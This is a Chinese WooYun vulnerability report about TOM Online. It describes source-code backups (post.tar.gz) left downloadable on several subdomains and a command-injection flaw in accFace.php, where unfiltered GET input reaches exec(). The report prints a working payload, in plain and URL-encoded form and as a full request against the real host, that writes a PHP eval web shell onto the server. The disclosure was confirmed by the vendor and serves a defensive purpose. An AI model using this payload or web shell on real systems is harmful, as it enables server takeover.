当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-046823

漏洞标题:TOM在线某运维缺陷导致任意命令执行

相关厂商:TOM在线

漏洞作者: felixk3y

提交时间:2013-12-23 17:49

修复时间:2014-02-06 17:50

公开时间:2014-02-06 17:50

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-12-23: 细节已通知厂商并且等待厂商处理中
2013-12-24: 厂商已经确认,细节仅向厂商公开
2014-01-03: 细节向核心白帽子及相关领域专家公开
2014-01-13: 细节向普通白帽子公开
2014-01-23: 细节向实习白帽子公开
2014-02-06: 细节向公众公开

简要描述:

对Tom在线的运维缺陷加以利用直接导致命令执行

详细说明:

@xsser 刚才发的那个TOM任意文件上传,我知道是已经提交过的,但厂商没有修复,麻烦再通知下厂商,谢谢.
对这个漏洞我真不想说什么了,运维的、写代码真的应该好好给他们洗洗脑...
#1 好多个网站的源代码任意下载

http://post.news.tom.com/post.tar.gz
http://post.tom.com/post.tar.gz
http://post.weiqi.tom.com/post.tar.gz
http://post.auto.tom.com/post.tar.gz
http://post.she.tom.com/post.tar.gz


应该还没列完,好好检查下。
#2 解压post.tar.gz

C:\Users\Administrator\Desktop\code 的目录
2013/12/23  17:07    <DIR>          .
2013/12/23  17:07    <DIR>          ..
2013/12/23  16:02    <DIR>          .svn
2013/12/23  16:02    <DIR>          ajax
2013/12/23  16:02    <DIR>          cache
2013/12/23  16:03    <DIR>          channel
2013/12/23  16:02    <DIR>          class
2013/12/23  16:02    <DIR>          cmslog
2013/12/23  16:02    <DIR>          cmslog2
2013/12/23  16:02    <DIR>          cmslog3
2013/12/23  16:02    <DIR>          config
2013/12/23  16:02    <DIR>          cron
2013/12/23  16:02    <DIR>          dyp
2013/12/23  16:03    <DIR>          functions
2013/12/23  16:02    <DIR>          help
2013/12/23  16:03    <DIR>          images
2013/12/23  16:03    <DIR>          img_tmp
2013/12/23  16:03    <DIR>          include
2013/12/23  16:02    <DIR>          index
2013/12/23  16:02    <DIR>          infchannel
2013/12/23  16:03    <DIR>          interface
2013/12/23  16:02    <DIR>          lib
2013/12/23  16:02    <DIR>          log
2013/12/23  16:02    <DIR>          post
2013/12/23  16:02    <DIR>          qa
2013/12/23  16:02    <DIR>          related_news_cache
2013/12/23  16:03    <DIR>          script
2013/12/23  16:02    <DIR>          shell
2013/12/23  16:02    <DIR>          style
2013/12/23  16:02    <DIR>          template
2013/12/23  16:02    <DIR>          test
2013/12/23  16:03    <DIR>          testjs
2013/12/23  16:02    <DIR>          tmp
2013/12/23  16:03    <DIR>          userface
2011/08/01  15:56            12,288 .鏂板崕缃_0110614-20110615_.txt.swp
2009/03/25  17:17            79,215 4A000A95112.html
2011/06/24  13:36            15,583 778DV6L3.html
2010/08/04  14:28                 0 a.txt
2009/03/25  17:16               623 aa.html
2009/03/25  17:16               280 aa.php
2013/12/23  17:09             2,145 accFace.php
2009/03/25  17:16            52,383 ag.php
2011/06/24  17:44            71,786 article_gallery_special.php
2011/07/12  13:22            71,085 article_gallery_special2011bai.php
2010/04/22  18:13            65,989 article_gallery_special_t.php
2010/09/16  10:59            69,760 article_gallery_v2.php
2009/03/25  17:17            57,872 article_gallery_v2_t.php
2011/06/25  11:09            73,872 article_special.php
2011/01/05  16:51            72,558 article_special2.php
2011/07/27  14:56            73,943 article_special20110726.php
2011/07/21  18:52            75,839 article_special2011bai.php
2011/07/21  18:21            75,839 article_special2011bai1.php
2011/01/28  11:07            73,794 article_special3.php
2011/06/24  14:19            74,136 article_special4.php
2009/08/14  11:09            73,268 article_special_test.php
2009/03/25  17:17            57,659 article_t.php
2009/03/25  17:17            85,644 article_v3.html
2009/03/25  17:17            56,547 article_v3_20090120_wd_bak.php
2010/09/17  17:03            70,262 article_v5.php
2009/09/28  14:30            66,067 article_v5_t.php
2010/07/27  13:00                89 asx.php
2011/03/02  17:26               867 auto_delete_nandu.php
2011/02/25  17:33               134 auto_delete_nandu.sh
2010/06/29  10:24                 0 b
2009/08/20  17:00             1,553 batchcomment.php
2009/03/25  17:17             4,169 bot.php
2009/03/25  17:16             3,046 cn.php
2009/08/10  09:13            30,870 comment.php
2009/03/25  17:16            10,297 common.functions.php
2010/06/03  15:32            11,191 del.txt
2010/08/03  11:19            27,222 delete
2011/08/30  15:47         2,299,080 deleteSucc.log
2011/02/24  17:34                38 deletetmp.txt
2009/03/25  17:16             3,737 doCatalog.php
2009/03/25  17:17             1,364 doDeleteArticle.php
2009/03/25  17:16               999 doLogin.test.php
2009/03/25  17:16             1,421 doRegister.php
2009/03/25  17:17             3,938 doUpdateUser.php
2009/09/03  12:08             3,665 doUploadArticleImg.php
2010/04/22  11:01             3,636 doUploadImage.php
2009/09/03  13:11             3,740 duai.php
2010/06/07  15:18                19 env.php
2009/03/25  17:16             1,150 favicon.ico
2011/08/04  09:56               752 fazhi20110804.txt
2009/03/25  17:17             1,477 foreign.php
2009/03/25  17:16            22,414 g.php
2009/08/18  11:26            18,654 gallery.php
2009/07/06  17:29            24,891 gallery_bak.php
2009/07/09  14:21            18,660 gallery_t.php
2010/03/30  10:11               271 gettangyuan.php
2009/11/20  17:08             2,806 HanroadClass.php
2009/07/08  15:54             1,435 hwbang.php
2009/03/25  17:16               584 hwrec.php
2009/07/08  15:54             1,487 hwtag.php
2009/03/25  17:17             1,111 hyperwords.php
2009/07/24  17:57             2,362 index.html
2011/08/30  13:00            13,037 index.php
2009/03/25  17:17            12,757 index1.html
2009/03/25  17:16               311 indexStat.php
2009/07/06  18:46            61,822 index_voice.php
2009/07/06  18:23            61,494 index_voice_bak.php
2009/03/25  17:16                25 ip.php
2010/07/07  15:28             1,245 j
2010/07/07  15:30            10,588 j1
2010/07/07  15:25            36,553 jhsblynew
2010/07/07  15:25             8,172 jhsbzwnew
2009/03/25  17:17               730 link.php
2009/06/01  20:27               523 log.php
2009/07/24  17:53             2,926 login.php
2009/03/25  17:17               693 logout.php
2010/11/03  16:52             3,114 main.inc.php
2009/03/25  17:16             1,807 manageArticle.php
2009/03/25  17:16             1,059 manageArticleByCatalog.php
2009/03/25  17:17               667 manageCatalog.php
2009/03/25  17:17               630 manageUser.php
2009/03/25  17:17               597 modify_list
2009/03/25  17:17               428 msg.html
2011/02/24  18:19            24,599 nandu_end.txt
2011/02/28  15:47               191 nandu_end2011-02-28.txt
2011/03/30  15:47               152 nandu_end2011-03-30.txt
2011/03/31  15:47               152 nandu_end2011-03-31.txt
2011/04/30  15:47                86 nandu_end2011-04-30.txt
2011/05/30  15:47               154 nandu_end2011-05-30.txt
2011/05/31  15:47               154 nandu_end2011-05-31.txt
2011/06/01  15:47                 0 nandu_end2011-06-01.txt
2011/06/02  15:47                13 nandu_end2011-06-02.txt
2011/06/03  15:47                13 nandu_end2011-06-03.txt
2011/06/04  15:47                13 nandu_end2011-06-04.txt
2011/06/05  15:47                13 nandu_end2011-06-05.txt
2011/06/06  15:47                13 nandu_end2011-06-06.txt
2011/06/07  15:47                13 nandu_end2011-06-07.txt
2011/06/08  15:47                13 nandu_end2011-06-08.txt
2011/06/09  15:47                13 nandu_end2011-06-09.txt
2011/06/10  15:47                26 nandu_end2011-06-10.txt
2011/06/11  15:47                26 nandu_end2011-06-11.txt
2011/06/12  15:47                26 nandu_end2011-06-12.txt
2011/06/13  15:47                39 nandu_end2011-06-13.txt
2011/06/14  15:47                39 nandu_end2011-06-14.txt
2011/06/15  15:47                52 nandu_end2011-06-15.txt
2011/06/16  15:47                65 nandu_end2011-06-16.txt
2011/06/17  15:47                78 nandu_end2011-06-17.txt
2011/06/18  15:47                78 nandu_end2011-06-18.txt
2011/06/19  15:47                78 nandu_end2011-06-19.txt
2011/06/20  15:47                91 nandu_end2011-06-20.txt
2011/06/21  15:47                91 nandu_end2011-06-21.txt
2011/06/22  15:47                91 nandu_end2011-06-22.txt
2011/06/23  15:47                91 nandu_end2011-06-23.txt
2011/06/24  15:47                91 nandu_end2011-06-24.txt
2011/06/25  15:47                91 nandu_end2011-06-25.txt
2011/06/26  15:47                91 nandu_end2011-06-26.txt
2011/06/27  15:47               116 nandu_end2011-06-27.txt
2011/06/28  15:47               116 nandu_end2011-06-28.txt
2011/06/29  15:47               116 nandu_end2011-06-29.txt
2011/06/30  15:47               116 nandu_end2011-06-30.txt
2011/07/01  15:47                13 nandu_end2011-07-01.txt
2011/07/02  15:47                26 nandu_end2011-07-02.txt
2011/07/03  15:47                26 nandu_end2011-07-03.txt
2011/07/04  15:47                50 nandu_end2011-07-04.txt
2011/07/05  15:47                50 nandu_end2011-07-05.txt
2011/07/06  15:47                86 nandu_end2011-07-06.txt
2011/07/07  15:47                86 nandu_end2011-07-07.txt
2011/07/08  15:47               110 nandu_end2011-07-08.txt
2011/07/09  15:47               110 nandu_end2011-07-09.txt
2011/07/10  15:47               110 nandu_end2011-07-10.txt
2011/07/11  15:47               110 nandu_end2011-07-11.txt
2011/07/12  15:47               110 nandu_end2011-07-12.txt
2011/07/13  15:47               110 nandu_end2011-07-13.txt
2011/07/14  15:47               110 nandu_end2011-07-14.txt
2011/07/15  15:47               110 nandu_end2011-07-15.txt
2011/07/16  15:47               110 nandu_end2011-07-16.txt
2011/07/17  15:47               110 nandu_end2011-07-17.txt
2011/07/18  15:47               110 nandu_end2011-07-18.txt
2011/07/19  15:47               110 nandu_end2011-07-19.txt
2011/07/20  15:47               110 nandu_end2011-07-20.txt
2011/07/21  15:47               110 nandu_end2011-07-21.txt
2011/07/22  15:47               110 nandu_end2011-07-22.txt
2011/07/23  15:47               110 nandu_end2011-07-23.txt
2011/07/24  15:47               110 nandu_end2011-07-24.txt
2011/07/25  15:47               110 nandu_end2011-07-25.txt
2011/07/26  15:47               121 nandu_end2011-07-26.txt
2011/07/27  15:47               146 nandu_end2011-07-27.txt
2011/07/28  15:47               159 nandu_end2011-07-28.txt
2011/07/29  15:47               159 nandu_end2011-07-29.txt
2011/07/30  15:47               159 nandu_end2011-07-30.txt
2011/07/31  15:47               159 nandu_end2011-07-31.txt
2011/08/01  15:47                 0 nandu_end2011-08-01.txt
2011/08/02  15:47                 0 nandu_end2011-08-02.txt
2011/08/03  15:47                 0 nandu_end2011-08-03.txt
2011/08/04  15:47                 0 nandu_end2011-08-04.txt
2011/08/05  15:47                 0 nandu_end2011-08-05.txt
2011/08/06  15:47                 0 nandu_end2011-08-06.txt
2011/08/07  15:47                 0 nandu_end2011-08-07.txt
2011/08/08  15:47                 0 nandu_end2011-08-08.txt
2011/08/09  15:47                12 nandu_end2011-08-09.txt
2011/08/10  15:47                12 nandu_end2011-08-10.txt
2011/08/11  15:47                12 nandu_end2011-08-11.txt
2011/08/12  15:47                12 nandu_end2011-08-12.txt
2011/08/13  15:47                12 nandu_end2011-08-13.txt
2011/08/14  15:47                12 nandu_end2011-08-14.txt
2011/08/15  15:47                12 nandu_end2011-08-15.txt
2011/08/16  15:47                12 nandu_end2011-08-16.txt
2011/08/17  15:47                25 nandu_end2011-08-17.txt
2011/08/18  15:47                25 nandu_end2011-08-18.txt
2011/08/19  15:47                25 nandu_end2011-08-19.txt
2011/08/20  15:47                25 nandu_end2011-08-20.txt
2011/08/21  15:47                25 nandu_end2011-08-21.txt
2011/08/22  15:47                25 nandu_end2011-08-22.txt
2011/08/23  15:47                38 nandu_end2011-08-23.txt
2011/08/24  15:47                38 nandu_end2011-08-24.txt
2011/08/25  15:47                50 nandu_end2011-08-25.txt
2011/08/26  15:47                63 nandu_end2011-08-26.txt
2011/08/27  15:47                63 nandu_end2011-08-27.txt
2011/08/28  15:47                63 nandu_end2011-08-28.txt
2011/08/29  15:47                63 nandu_end2011-08-29.txt
2011/08/30  15:47                63 nandu_end2011-08-30.txt
2011/01/19  16:49             8,336 nandu_new.txt
2011/02/25  16:37                24 nandu_new1.txt
2011/02/24  18:10            26,631 nandu_trans.txt
2010/06/28  14:53               611 ndylzkbak
2010/06/28  14:53               579 ndzkbak
2009/04/08  18:18               201 new
2009/04/02  15:42               850 new.php
2009/03/25  17:16            46,029 newsearch.php
2009/09/04  10:20             1,272 NewsEdit.html
2009/03/25  17:17            46,415 ourgame.php
2009/06/16  15:39            64,022 ourgame_gallery.php
2009/06/15  13:15            66,174 ourgame_v2.php
2009/05/31  10:54            18,343 out.txt
2009/03/25  17:16             3,186 pass_indexlogin.js
2009/03/25  17:17             4,262 pdnav.js
2009/03/25  17:17               614 pfprt.php
2009/03/25  17:17            31,233 pn.php
2009/07/09  17:33             3,891 PostCollector.php
2009/08/01  17:28             6,284 PPCache.php
2009/11/03  16:56            28,937 publish_news.php
2010/06/07  16:11            29,522 publish_news_t.php
2009/04/08  16:54            34,624 publish_news_v2.php
2011/04/06  17:49           180,587 qingnianbao_res.txt
2011/04/08  08:56            59,768 qingnianbao_res1.txt
2009/03/25  17:16             2,169 redirect.php
2009/03/25  17:17             2,174 redirect8.php
2009/03/25  17:16             2,209 redirect8_test.php
2009/03/25  17:17               813 register.php
2010/05/28  19:48             3,131 renming
2009/03/25  17:16            21,551 scriptt
2009/03/25  17:17               673 search.php
2009/03/25  17:17               685 searchUtf8.php
2011/05/12  10:08               577 Search_agent.html
2009/03/25  17:16                54 sitemap.html
2009/03/25  17:16           138,275 sk.html
2009/03/25  17:16           304,774 sk.js
2009/03/25  17:17           304,799 sk1.js
2011/01/28  12:06             1,510 snooker_weibo.html
2009/03/25  17:16            77,809 sport_vote_1.html
2009/03/25  17:17             1,181 status.php
2009/03/25  17:17            91,784 t.html
2009/04/13  13:17            65,423 t.php
2009/08/26  15:38               209 t0.php
2009/04/15  14:15             2,604 t1.php
2009/03/25  17:17               842 t2.php
2009/08/28  15:52             6,275 tag.php
2009/08/28  15:51             6,088 tag1.php
2009/08/28  15:47             6,147 tag20080320.php
2009/03/25  17:17             4,187 tag_list_comments.php
2009/03/25  17:16             4,488 tag_list_digs.php
2009/03/25  17:16             4,212 tag_list_tramples.php
2009/03/25  17:17           109,674 test.html
2011/08/04  10:08               455 test.php
2010/05/28  20:02             2,747 test.txt
2011/07/18  17:47               147 test2.php
2010/06/03  15:40             2,917 test2.txt
2009/03/25  17:17               388 test_article_list.php
2011/06/28  10:24               373 test_cao.php
2009/08/04  18:00             4,848 test_cms.html
2009/03/25  17:16             4,078 top.php
2009/03/25  17:17             4,053 top1h.php
2009/06/29  10:24             6,853 TPPClient.php
2009/04/09  16:29               159 trip.php
2009/03/25  17:16               832 tt.html
2009/04/10  11:39             1,169 tt.php
2009/03/25  17:16             2,771 uai.php
2009/09/03  11:55             2,683 uai_t.php
2009/09/08  10:58               932 update.php
2009/08/28  10:48             1,335 updatesmall.php
2009/09/03  13:25             2,476 uploadArticleImg.php
2009/09/22  09:45             4,832 user.php
2009/11/03  14:42             4,509 userInfo.php
2009/03/25  17:16               757 vimrc
2010/10/15  14:20                39 wcf
2010/10/13  10:41               477 wcf.php
2010/10/15  14:21                39 wcfanother
2010/10/15  14:22                39 wcfanother11
2010/10/15  14:20                39 wcfdefault
2009/03/25  17:16            57,881 weekend.php
2009/03/25  17:16             1,002 weekend_x.php
2011/06/15  11:27                81 xinhua20110614-20110615.txt
2011/06/15  11:20                84 xinhua20110614-20110615_.txt
2011/06/28  10:22             2,883 xinhua20110616-0628_new.txt
2011/06/28  15:48             2,663 xinhua20110616-0628_new_res.txt
2011/06/28  09:54             5,594 xinhua20110616.txt
2011/06/28  10:00            16,073 xinhua20110616_res.txt
2010/08/03  20:02               307 zgxwzk
2011/07/08  14:49            73,872 拷贝于 article_special.php
2011/06/15  11:20                84 鏂板崕缃_0110614-20110615_.txt

漏洞证明:

#3 对下载的代码进行简单审计
根目录下的accFace.php文件

<?php
//...
$faceName = urldecode(trim($_GET['faceName']));
$tmpPath = urldecode(trim($_GET['tmpPath']));
if (get_magic_quotes_gpc()) {
    $faceName = stripslashes($faceName);
    $tmpPath = stripslashes($tmpPath);
    $localPath = stripslashes($localPath);
}
$subPath = $FACE_LOCAL_PATH.preg_replace('/\\/[^\\/]+?\\w$/i', '', $faceName);
if (!file_exists($subPath)) {
    @exec("mkdir -p $subPath");
}
$commandDesc = "wget -O $FACE_LOCAL_PATH$faceName $tmpPath$faceName";
exec($commandDesc);
//生成缩略图
resizeImage($FACE_LOCAL_PATH.$faceName, $FACE_LOCAL_PATH.str_replace('.', '_s.', $faceName), $RESIZE_WIDTH, $RESIZE_HEIGHT);
?>


65-67行:

if (!file_exists($subPath)) {
    @exec("mkdir -p $subPath");//一看就知道是C程序员写的, exec啊,其实吧,php有相应函数的....
}


$subPath没过滤,导致任意命令执行...
#4 利用吧
直接访问accFace.php爆出绝对路径,好吧 那我们就写个shell进去...

1.jpg


我们构造faceName参数为:

aa || echo '<?php eval($_POST[#]);?>It works' >/data/webroot/post/tom.php


Encode 下:

aa%20%7C%7C%20echo%20'<%3Fphp%20eval(%24_POST%5Bcmd%5D)%3B%3F>It%20works'%20>%2Fdata%2Fwebroot%2Fpost%2Ftom.php


GET提交:

http://post.news.tom.com/accFace.php?faceName=aa%20%7C%7C%20echo%20'%3C%3Fphp%20eval(%24_POST%5Bcmd%5D)%3B%3F%3EIt%20works'%20%3E%2Fdata%2Fwebroot%2Fpost%2Ftom.php&tmpPath=1&localPath=1


命令执行了,在根目录下生产tom.php

2.jpg


#5 shell show

3.jpg

修复方案:

备份文件删或改,代码好好检查下.哈哈 帮你们找到个那么严重的漏洞,有礼物否...

版权声明:转载请注明来源 felixk3y@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2013-12-24 10:58

厂商回复:

非常感谢您对TOM在线的帮助,我们会尽快做出处理。我们为支持TOM在线的发布者创建了一个技术交流QQ群:328442670,希望您以及更多的成员加入,大家共同交流。同时TOM在线在通过公司申请后会不定期发送礼品给发布者,以表您对TOM在线的支持。

最新状态:

暂无